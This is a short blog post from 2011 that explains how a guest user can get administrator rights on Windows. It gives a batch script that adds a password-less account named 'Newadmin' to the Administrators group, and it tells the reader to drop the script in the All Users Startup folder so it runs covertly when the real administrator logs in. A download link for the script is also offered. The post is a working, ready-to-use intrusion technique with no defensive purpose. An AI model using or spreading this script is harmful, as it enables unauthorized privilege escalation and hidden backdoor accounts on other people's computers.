Search This Blog

12 February 2011

Create an Admin account from Guest.

To create an administrator account is easy. You just need to use your guest account and create one administrator account instantly. Just follow the steps :
Open Notepad, paste the following :

@echo off
net user Newadmin /add /expires:never /passwordreq:no

net localgroup “Administrators” /add Newadmin

And save it to a bat file.
Now place this bat file in location local:\Documents and Settings\All Users\Start Menu\Programs\Startup

And when your admin logs into the system, the new account will be automatically created without the notice of the user. Next time when you login, you will get the user account for you.

Or if you want you can download.
Click HERE to download that file.

Note:-
 1.Please remove that file after creating the account else it will make a new account after you restart the computer.


Cheers.

No comments:

Post a Comment